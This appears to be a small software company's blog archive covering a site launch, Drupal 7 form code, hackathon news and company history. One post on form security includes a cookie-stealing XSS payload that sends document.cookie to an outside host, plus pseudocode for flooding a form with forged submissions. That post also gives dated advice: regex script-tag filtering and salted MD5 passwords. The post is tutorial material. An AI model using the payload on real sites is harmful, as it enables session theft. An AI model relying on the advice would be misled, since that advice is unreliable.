Dog Boarding in Sweden

April 8, 2013 by Shishir Singh

For past couple of months, one of our team is working on a exciting project called Tasspass. Tasspass is a concatenation of two Swedish words – Tass and Pass, Tass means “paw” and Pass means “home”.

Tasspass is one of the very first dog boarding site in Sweden. We have developed the site from scratch including logo and website design.

We are glad to share the news that tasspass.se is launching today. We are very proud to be associated with Tasspass and we firmly believe that it’ll do very well in days to come. We wish them luck and success.

Happy (dog) boarding!!

Share and Enjoy

Web Applications Security – Forms, when not well formed

February 27, 2013 by Pradeep

Over whelming responses on the part 1 of this series was awesome, lots of queries via twitter and bunch of good comments excited me to write on higher frequency, taking a note of same now. As promised to provide solution to query asked in part 1, it flows down below:

Practically there will be lots of address and lots of things that you can pass on as gift and for sure, it would be a better idea to do something like this:

// let us assume that current user will send gift as a deliverable to himself/herself
// we will address the issue to send the gift to her/him in upcoming days
if(isUserRegisteredWithAddress(address)){
performDelivery("gift","address");
}

We will continue toward better solutions throughout the series but don’t hesitate to post your just now.

Okay, let’s fasten our seat belts again to have a fast paced ride.

When I asked many developers which is the most important tag you think? Most of them answered <form> tag because it is the thing that does everything way round between site and its user.

As a security concern <form> tag is “the one” tag which needs to be taken care of the most, lets discuss the various security concerns with this element, later we will discuss various approach to solve these concerns.

1. Cross site scripting

The de’facto well known hack out there using javascript. Let’s see how it works. Consider a form like this:

<form action="SaveReview" method="GET">
  Your name: <input type="text" name="name">
  Your review: <input type="text" name="review">
  <input type="submit" value="Submit">
</form>

Okay, now there comes an user and enter his name prady and in the review field enters this:

<script>
document.location = 'http://pradeep-kumar.in/stealCookies?cookies=' + document.cookie;
</script>

You probably take review of particular user to show it somewhere on your site. You tried to show prady’s reviews and what’s this? He got cookies of different users. Your users being dumped in someway other.

2. Spoofed form submission

Now for the above form, someone can easily program bogus form submissions. That can be done something like below by anyone in any technology of his/her choice

//initialize variables
name=prady;
review=review;
WHILE(1){
//initiate a new http request and repeatably forge
request='http://yoursite.com/saveReview?name=' + name + '&amp;review=' + review;
name=randomize(name);
review=randomize(review);
}

Your site will be overwhelming by reviews in a very short period of time.

Fixing the problems

Lets discuss a fix for XSS attack. We can dis-allow <script> tag by using regular expressions in our controller for saving new reviews. Most of the frameworks and CMS do that for you, take care of this issue for code re-use and better maintainability.

Now comes forged formed submission. Here we can include a encrypted form number in a hidden field in form and save the same somewhere on server, when user submits form, we can cross check the validity of form itself by matching form number in GET request against stored ones on server.

These are just some fixes to the problems, most of them already taken care like most browsers doesn’t allow cross-domain ajax requests just because of existence of XSS there. So, script posted above will not work in modern browsers. Please post your solutions to problems in the comments and stay tuned for next post.

See you soon.

Share and Enjoy

Dynamic Forms with Drupal 7 FAPI and form states

February 21, 2013 by Pradeep

When it comes to fast paced delivery with better managed things nothing beats Content Management Frameworks, yes there are few outs, but the king Drupal 7 still is far better than its counters just because of de-normalized structure of underlying database and best ever flexibility of taxonomies and relations. Last few days for one of our team working on Drupal 7 were really challenging and I really could not managed to not to log our learnings here , so here we go!
Okay, let me first tell what we were expected to do:

Dynamic loading of multiple fields of a form based on selected fields

Having implemented dependent-dropdowns recently, we were aware that D7 respects ajax too much.

We as usual made direction towards Examples Module, we get following code there:

$form['dropdown_first'] = array(
‘#type’ => ‘select’,
‘#title’ => ‘Instrument Type’,
‘#options’ => $options_first,
‘#default_value’ => $selected,
‘#ajax’ => array(
‘callback’ => ‘ajax_example_dependent_dropdown_callback’,
‘wrapper’ => ‘wrap’,
));

$form['dropdown_second'] = array(
‘#type’ => ‘select’,
‘#title’ => $options_first[$selected],
‘#prefix’ => ‘< div id=”wrap” >’,
‘#suffix’ => ‘< /div >’);

In the above code on selection of dropdown_first, dropdown_second gets values from server via an ajax request and replaces elements inside ‘wrap’. We thought what if we put this wrapper around whole of the form element, we delve for same and a comment on this D7 node turned to be a real catalyst.

We tried following and we were sailing in a short period of time:

//*1 and *2 make form dependent on selected solution area
//*1–define properties for solution area
$form['field_select_a_solution_to_revie']['und']['#ajax'] = array(
‘event’ => ‘autocompleteSelect’,
‘wrapper’ => ‘wrapper-vendor-review’,
‘callback’ => ‘solution_area_selected_ajax_callback’,
‘method’ => ‘replace’,
);

//*2–define properties for form
$form['#prefix'] = ‘<div id=”wrapper-vendor-review”>’;
$form['#suffix'] = ‘</div>’;

And below is some of the code that we used in solution_area_ajax_callback()

$form_state['input']= array();
$form_state['rebuild'] = TRUE;
$empty_form = drupal_rebuild_form(‘comment_node_vendor_profile_form’,&$form_state, null );
$empty_form['field_select_a_solution_to_revie']['und']['#value'] = taxonomy_term_load($tid)->name;
return $empty_form;

This was only a peek how to achieve multi-field dependency in drupal. There are more exciting ways in which FAPI and form-states are proven real powers, depends how we exploit them. As a small bonus, soon going to write on achieving transitive dependency of different fields in drupal forms. Stay tuned !

Our handle on twitter is @sopantech, see you there.

Share and Enjoy

Web Applications Security – Introduction

January 19, 2013 by Pradeep

As a matter of fact we all make mistakes. Some of us learn from them and others just ignore. But when it comes to the web applications that we develop, there should be no point of making mistakes, because our mistakes can cause a huge loss of business and in some cases loss of life! Here mistakes refer to architectural mistakes, UX mistakes and many others. But the most prominent one is mistakes made in security, leaving the loop-holes, that can be used by others to harm your application. Being on web means open for everyone, leaving open-gates there means you are inviting everyone.

When I started writing this blog I wanted to cover overview of web-applications security in a single blog-post but as you know security is a vast subject and can’t be covered in a single blog post, i decided to divide this in a blog series. So, here comes the first.

For the upcoming posts you can subscribe to our blog. I know you are a social animal, that’s why we are on Facebook, like us there and stay connected. For the tweeples a bonus : @sopantech

So you as a developer think that you need to develop things that work. Better think this from now – “I develop things that work only in certain conditions”. Okay enough said, now think your web-application is being hacked. What to do next, you have something in backup? No.. Now here comes rule 1:

Have a backup plan Whether or not you have a backup plan. Have one now. Who knows your application may just sink when you test different vulnerabilities against your application, that we are going to discuss in upcoming days. I have three type of user in my web-application one can do this another can do that….but one can do this also….wait a minute. Look rule 2:

Least Privilege Give user not more than what they actually need. If a user is meant for only data entry whats the use of giving him/her privileges for viewing past data. They may get all past data and misuse it. Data is valuable.

Minimum Exposure Yes, Data is valuable don’t show it all, important information like Credit Card Numbers, Passwords must be given a due care. Saving hashed password with md5 algorithm with a salt added gives another layer of security when peoples with wrong intention compromise your database.

Trade-off between usability and security A trade-off between space and time is well known but when it comes to security, smart decisions are to be taken to keep usability at good levels.

Don’t correct any data If user is passing data, force them to provide correct data rather than correcting it. For example you don’t want to give access to parent directory for any user. So, you replaced “..” with “.” , but what if someday hacker put in “…” ?

Its all about connections Most of the security breaches are found where exists some ‘connection’ between two entities. These entities can be client-server , database and application, API and its accessing clients. Let’s have an example for these. Suppose you have a form:

<form action="deliverGift" method="GET" name="myform">
<select name="gift">
<option value="watch">Watch</option>
<option value="popcorns">Popcorns</option>
<option value="sandwitch">Sandwitch</option>
</select>
<input type="hidden" name="address" size="25" value="heaven on earth" />
</form>

… and somewhere in deliverGift you wrote: performDelivery( “gift”,”address”); but the story doesn’t end here. What if the user makes a spoofed HTTP GET requested in the form:

 /deliverGift?gift=keyboard&address=usa

In such case your application will end up in delivering a keyboard to usa, that’s you certainly don’t want! A cure to this problem is:

// updated code
if(gift==watch) {
performDelivery("gift","address"); 
} 
if(gift==popcorn) { 
performDelivery("gift","address"); 
}
if(gift==sandwitch) { 
performDelivery("gift","address"); 
}

or you can go with some switch case construct.

That would work fine. But better use following code:

if(gift==watch OR gift==popcorn OR gift==sandwitch){ 
performDelivery("gift","address");
}

But it’s not over, you are leaving a loop-hole for wrong address!

Please try to solve out by yourself and post your solution in comment. Solution will be included in next blog post.

Share and Enjoy

Code4it Moments

January 5, 2013 by Shishir Singh

We managed to capture a couple of moments in today’s super hectic Code4it event. Event was a great success, each and every demo was full of ‘wow’ moments. But there can be only one winner and the winners for the season 1 of Code4it event were chmod 777 team (Pradeep and Gaurav). Congratulations to both!!


					30 mins lunch break!
Demo session of Code4it
Share and Enjoy

Share and Enjoy

First edition of Code4it kicked off!

January 5, 2013 by Shishir Singh

Code4it, as the name suggests, is a quarterly hack event at Sopan Technologies which is kicking off today. Going forward, we plan to conduct the event on first Saturday of every quarter. Rules are simple – everyone in the organization can participate and at the end of the day, they need to come up with a prototype (or a functional app, if possible) based on an original, novel and innovative idea. People can either participate as teams (max 2 members in a team) or individually.

At the end of the day, each team/participant need to give a demo of what they have built. All other participants would rate the “app” on a scale of 10 without disclosing the score to anyone. Once the demos are complete, we’ll pick 1-3 individuals/teams based on the scores. Essentially no team would end up with “first” or “last” rank.

We are excited to see that everyone has participated enthusiastically in the event and right now, everyone is busy coding furiously. Loving it! Will update the blog with event pictures later on.

Share and Enjoy

Happy New Year 2013!

January 1, 2013 by Shishir Singh

On behalf of Sopan Technologies team, I wish you all a very happy and prosperous new year 2013.

Happy New Year 2013!

2012 has been a great year and we hope that 2013 would be even more exciting. We plan to add a lot more offering to our existing services like mobile apps, mobile data collection and reporting tools apart from couple of cool products.

We would like to take this opportunity to thank all our clients and partners for their kind support and trust. Have a great year ahead.

Share and Enjoy

Down the memory lane: From SopanTech to Sopan Technologies

November 29, 2012 by Shishir Singh

While searching for some files, I found old logos of the company. Though these old logos are of practically no use as of now but I still remember how much efforts we spent on creation of those logos. It wouldn’t be wrong saying that they are still very close to our heart – as much as the current logo. And it’s not just the logo, our company name also went though changes with each logo.

SopanTech (2008)

This was the first company logo and company was founded with name SopanTech.

First Logo

SopanTech Solutions (2009)

This was the second logo and with this logo, the name of company was changed from just SopanTech to SopanTech Solutions.

Second Logo

Sopan Technologies (2010)

And then we revised the logo again along with company name. Finally, the company was legally registered in year 2010 but change in company name was not intentional. We were trying to get the company registered as SopanTech Solutions, however due to some issues we didn’t get that name and we had to go with our second option which was Sopan Technologies. Later we realized that Sopan Technologies in fact represents our services in a more meaningful way.

Current Logo

P.S. – The word Sopan is a Sanskrit word which means “Step”. As far as we are concerned, it means step towards success. Cheers!!

Share and Enjoy

Diwali Celebration

November 17, 2012 by Shishir Singh

Diwali celebration in office. Incidentally, it was birthday of Kanchan so it was a double blast!!!

Share and Enjoy

40DollarLogo covered by MashDesigning blog

August 28, 2012 by Shishir Singh

Popular design blog MashDesigning recently covered our logo design service 40DollarLogo.com in one of their post. They rated 40DollarLogo.com among the best three logo design services available today.

Excerpts from the blog post.

To make logos there are millions of logo designers or companies out there on the web, but 40DollarLogo is the thing that you must choose. 40DollarLogo lets the users to place their order with the details and in a few days or even hours, the buyer can have an awesome logo in his/her hands.

Some top quality of our logo design service covered by MashDesigning.

Affordable logo designs
Unlimited revisions for utmost client satisfaction
Fast delivery
Custom designs (No templates or clipart)
100% money back guarantee

You can read the full post here.

Are you looking for a new logo for your company or a redesign of your existing logo? Get in touch with our logo design team now – click here.